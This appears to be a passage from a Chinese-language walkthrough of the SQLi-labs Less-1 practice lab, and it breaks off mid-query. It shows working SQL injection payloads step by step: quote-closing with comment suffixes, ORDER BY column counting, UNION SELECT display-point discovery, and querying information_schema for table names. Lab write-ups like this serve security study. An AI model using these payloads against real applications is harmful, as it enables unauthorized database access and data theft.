Sqlilab-1
一、分析是否存在注入点:
分析该片段以及键入?id:1||?1||?id1后的报错信息可以得出基本形式输入形式为:
?id=1
如果增加一个’反引号使id=‘$id’闭合则剩一个’ 被注释后(--+ || --%20||%23),中间部分即可任由我们操作。
键入?id=1’ and 1=1 --+ 没有报错则说明可以注入
二、猜解列名数目:
键入?id=1’ order by 1/2/3/4%23后在4时出现报错提示,可以得出表一共有3列
三、报错判断回显点:
输入?id=1’ union select 1,2,3 --%20后出现2,3可以判断23位置为回显点。
注意!!union函数在使用时前后列数需要一致故进行第二步。
四、信息收集:
输入?id=1’ union select 1,version(),database() --%20
分别查询数据库版本与数据库名。
五、使用对应sql注入:
首先查数据库表名从information的schema库的tables中查找当前数据库名下的表
?id=99’ union select 1,group_concat(table_name),3 from information_schema.tables where table_schema = ’securi